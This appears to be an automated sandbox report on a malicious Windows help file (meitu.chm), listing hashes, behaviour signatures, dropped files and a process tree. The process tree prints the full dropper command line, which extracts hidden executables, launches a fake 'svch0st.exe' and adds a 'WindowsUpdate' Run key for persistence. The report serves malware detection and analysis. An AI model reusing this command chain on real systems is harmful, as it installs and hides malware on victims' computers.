Analysis

  • max time kernel
    131s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16-03-2023 03:22

General

  • Target

    virus/meitu.chm

  • Size

    1.2MB

  • MD5

    3dbfbb912f430ae62df647a767a86884

  • SHA1

    0604930ef6eef2e10ae38e9b89d819ecda25f847

  • SHA256

    8ffcc91dcb5657a9e8012bdc8b3b73bf541161f7c619e824fd5c5ae4b9b129f1

  • SHA512

    984f57541f443b36b991df5a2bbb4f55760a9a08f0b49d3fb9908c6bcc0a7fa6eb16cb3c2fbb659e700836af35eef942c007ab60c4bb09972d6a34968dc1e38d

  • SSDEEP

    24576:i7cuHGvz89BSOMfdLDCb1IlosIfHvzceiw3L3DYxROi2nmbvkIOMaNC:i7cuG89BSOALDs7sIPvzceiwb3DYv5bl

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\virus\meitu.chm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3568
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\System32\cmd.exe
        cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:448
        • C:\Windows\hh.exe
          hh -decompile C:\ProgramData\echelp ./meitu.chm
          4⤵
            PID:2588
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 1
            4⤵
            • Runs ping.exe
            PID:628
          • C:\Windows\system32\cmd.exe
            cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:864
            • C:\ProgramData\echelp\system_wiNuirements.mht
              C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\
              5⤵
              • Executes dropped EXE
              PID:732
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 1
            4⤵
            • Runs ping.exe
            PID:4260
          • C:\Windows\System32\ipconfig.exe
            "C:\Windows\System32\ipconfig.exe" /release
            4⤵
            • Gathers network information
            PID:1668
          • C:\Windows\system32\cmd.exe
            cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1728
            • C:\Windows\system32\reg.exe
              reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:1632
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 1
            4⤵
            • Runs ping.exe
            PID:2556
          • C:\ProgramData\echelp\svch0st.exe
            C:\ProgramData\echelp\svch0st.exe
            4⤵
            • Executes dropped EXE
            PID:4312
          • C:\Windows\System32\ipconfig.exe
            "C:\Windows\System32\ipconfig.exe" /renew
            4⤵
            • Gathers network information
            PID:3864
          • C:\Windows\system32\taskkill.exe
            taskkill /f /t /im hh.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3656

    Network

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\ProgramData\echelp\duankai.lnk
      Filesize

      1KB

      MD5

      494737c8bba58f091393c67d1a03f6c5

      SHA1

      2dadf68af7cef6a71638abdcf9002244b8234b46

      SHA256

      ce4d3b1be35448fedade51dfe257d5e416209dfa3602dbab194933c33a29459f

      SHA512

      60e09087de9b04153e88e3ea9d08f9860189f6475fbf8a20f3bc153586f02d9a20da88327e53d10be3af86700abc63eca74f7b25e3282aefdf3e2bd72e1d17e4

    • C:\ProgramData\echelp\introducziPn.mht
      Filesize

      891KB

      MD5

      0bad47cb97f01d24fdbefe3905d92d14

      SHA1

      75304034da42d22101a9680dc210ad76477d48bb

      SHA256

      621d858908e53288bac2581c51c6a401300d6e66365a21310d865ee392da0670

      SHA512

      37c54f4466c386f379c0ab10f7ca918ef019be41d2c5b45c2c02eaf59f41692d14f3600b08a2b5f05ed5994c397787b441526f73eded9e0300a7165e3af1b256

    • C:\ProgramData\echelp\ipconfig.lnk
      Filesize

      1KB

      MD5

      85816dff477434c9eee3dfb7f5adec3d

      SHA1

      f74a01d32eab8b975fef93802fecfe764a60dbb6

      SHA256

      960935b125cb86149b7c5399a050ecc6ce91164a156662cd181319c479c54212

      SHA512

      059aa8fd552c86c7504a93fda065cef5d1fdb93514ae99d459b517a2c5554c33d9c32d5b3f91a4adaba54185171cd4238e5813dd4568bed143097f4523e8759f

    • C:\ProgramData\echelp\svch0st.exe
      Filesize

      985KB

      MD5

      9606b727e58cb0157e1586adac252462

      SHA1

      9bbb77aea71b44f0f7737ed47bae3fa67df6c8d4

      SHA256

      8fcbe954783759e96a9cc1cf6aa2cb16d6c95a8f0a0c661ee0c1e241079c6de2

      SHA512

      1d07695b0d597703336d0d0a50353712c83ba5354de006a7a444dd270253ce5a4e362cb98e83acfedabe325f29e3da51946cc3625bb8f452cf212cdccc9eba1f

    • C:\ProgramData\echelp\system_wiNuirements.mht
      Filesize

      587KB

      MD5

      b5f45160976bb7ebac87b62ea1e6abcd

      SHA1

      0d08f13587ba55ca7792bf45ef2cc3d9925e411f

      SHA256

      2f32d221f332feb1530896849a5345b9dba7a64b6c432b99b2846bfaa316044c

      SHA512

      a0afc0ef35980157623b6390304a8427f9932ca8492fdc251cbb2802fb70e82b74b8c774d4df2f9b9968e970181dc2e382979e11d8b90d632a83ba6cea5c411a

    • memory/732-168-0x0000000000400000-0x0000000000507000-memory.dmp
      Filesize

      1.0MB